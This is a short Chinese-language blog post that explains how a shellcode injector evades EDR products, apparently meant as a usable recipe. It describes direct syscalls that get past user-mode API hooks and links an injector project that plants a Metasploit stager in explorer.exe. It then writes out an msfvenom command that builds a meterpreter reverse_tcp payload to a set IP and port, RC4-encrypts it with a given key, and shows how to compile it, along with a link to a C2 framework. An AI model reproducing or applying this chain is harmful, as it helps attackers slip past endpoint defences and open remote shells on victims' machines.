shellcode注入器绕过EDR

  • A+
所属分类:安全文章

EDR解决方案使用的最常见的方法是API挂钩,可以监视正在调用的函数以及传递的参数,使用了API挂钩可以在解密的shellcode仍在内存中但尚未写入进程之前被提取,判断其是否有恶意操作。

如何避免钩子?

使用syscall,可以直接调用内核,忽略所有windows API函数,由于EDR钩子因为内核补丁保护而只能置于用户模式,使用syscall直接调用内核,完全忽略他们。

直接调用syscall需要更多精力,必须处理windows API在后台执行的所有操作,需要编写和链接自己的程序集,必须是特定版本,因为syscall编码在windows版本之间会发生变化。

https://j00ru.vexillium.org/syscalls/nt/64/

以下项目将msf stager注入到explorer.exe,还包括LdrLoadDll HOOK和syscall可以绕过userland钩子,但会触发sysmonID 8(远程连接线程创建)事件告警。代码有待完善。

https://github.com/bats3c/DefensiveInjector

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.108 LPORT=12138 -f raw -o meter.bincat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.binxxd -i encmeter.bin

生成的shellcode替换main.c文件中的代码

字符串HideMyShellzPlz?为密钥132行可修改

shellcode注入器绕过EDR

shellcode注入器绕过EDR

shellcode注入器绕过EDR

执行命令make编译

shellcode注入器绕过EDR

shellcode注入器绕过EDR

shellcode注入器绕过EDR

shellcode注入器绕过EDR

原作者的C2框架https://github.com/bats3c/shad0w已实现了此技术。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: